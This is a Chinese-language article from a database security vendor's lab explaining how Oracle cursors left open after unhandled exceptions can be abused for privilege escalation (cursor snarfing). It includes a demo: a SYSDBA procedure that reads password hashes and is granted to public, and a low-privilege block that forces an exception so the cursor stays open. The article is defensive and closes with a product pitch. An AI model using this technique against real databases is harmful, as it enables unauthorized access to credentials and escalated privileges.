數據庫游標概念的引入,使數據庫操作更加靈活,但同時也為黑客入侵提供了便利。安華金和數據庫安全攻防實驗室(DBSec Labs)以Oracle游標為主要分析對象,基于其應用原理剖析游標可能帶來的數據庫安全隱患及安全措施,希望幫助用戶提前部署防護手段。
我們將Oracle游標的安全問題分為三類:
1、缺乏異常處理,掛起的游標被惡意利用
2、oracle游標漏洞提權
3、oracle游標設計本身的安全隱患
本文先對第一種安全威脅進行說明:
游標將數據庫中相應的信息存入內存塊中,當用戶打開游標的時候,可以直接訪問游標指向的內存塊中存放的信息,而無需再訪問基表獲得數據。如果一個高權限用戶建立一個游標卻沒關閉該游標,低權限用戶就有可能獲得游標中存儲的關鍵信息,或向打開的游標中注入惡意語句,進行高權限運行,達到提權或越權訪問的目的。這就是游標SNARF提權的基礎。
游標不正常關閉基本是人為造成的,高權限用戶忘記關閉,或者游標所在的子程序缺乏異常處理機制。如果沒有做相應的異常處理,黑客很有可能制造異常,使游標被一直掛起,利用未關閉的游標,注入惡意代碼。再利用游標自身的高權限執行惡意代碼,進行越權或者非法提權操作。
下面試驗用例由安華金和數據庫安全實驗室提供:
SQL> connect / as sysdba
已連接。
SQL> CREATE OR REPLACE PROCEDURE schina_test(P_USER VARCHAR) IS
2 CURSOR_NAME INTEGER;
3 PASSWORD VARCHAR2(30);
4 I INTEGER;
5 BEGIN
6 CURSOR_NAME := DBMS_SQL.OPEN_CURSOR;
7 DBMS_OUTPUT.PUT_LINE('CURSOR:'||CURSOR_NAME);
8 DBMS_SQL.PARSE(CURSOR_NAME,'SELECT PASSWORD FROM
9 SYS.DBA_USERS WHERE USERNAME=:schina',dbms_sql.native);
10 DBMS_SQL.BIND_VARIABLE(CURSOR_NAME,:schina',P_USER);
11 DBMS_SQL.DEFINE_COLUMN(CURSOR_NAME,1,PASSWORD,30);
12 I:=DBMS_SQL.EXECUTE(CURSOR_NAME);
13 IF PASSWORD = '01234567890ABCDEF' THEN
14 DBMS_OUTPUT.PUT_LINE('YOUR PASSWORD HASH IS NOT OK');
15 ELSE
16 DBMS_OUTPUT.PUT_LINE('YOUR PASSWORD HASH IS OK');
17 END IF;
18 DBMS_SQL.CLOSE_CURSOR(CURSOR_NAME);
19 END;
20 /
至此PL/SQL 過程已成功完成。
SQL> grant execute on schina_test to public;
授權成功。
schina_test 是一個缺乏異常處理代碼的存儲過程,它的作用是對為用戶找到其密碼hash值,然后和固定HASH值進行比較并返回結果。open_cursor打開游標直到close_cursor或SQL會話終止游標退出。由于缺乏異常代碼機制,用任意低權限賬號執行這個存儲過程,可以觸發異常掛起游標。
SQL> connect scott/tiger
已連接。
SQL> set serveroutput on
SQL> declare
2 x varchar(40000);
3 i integer;
4 begin
5 fro i in 1..10000 loop
6 x:='b'||x;
7 end loop;
8 sys. schina_test (x);
9 end;
10 /
CURSOR 3241423
通過向p_user中輸入一個過長的x,系統返回ORA-01460錯誤。由于存儲過程schina_test中沒有對異常進行處理,雖然存儲過程中關閉游標了,但由于發生異常,導致游標被掛起,同時并未真正關閉。可以對未關閉的游標注入惡意語句,以達到所需要的效果。
惡意代碼注入是三大數據庫安全問題之一,也是攻擊者常用的技術手段,通過對Oracle游標帶來的安全隱患分析,能夠讓用戶在預知風險的情況下提前部署相應的防護措施,如數據庫防火墻,可以對此類注入攻擊進行實時的攔截和阻斷。
產品咨詢:4000 258 365 
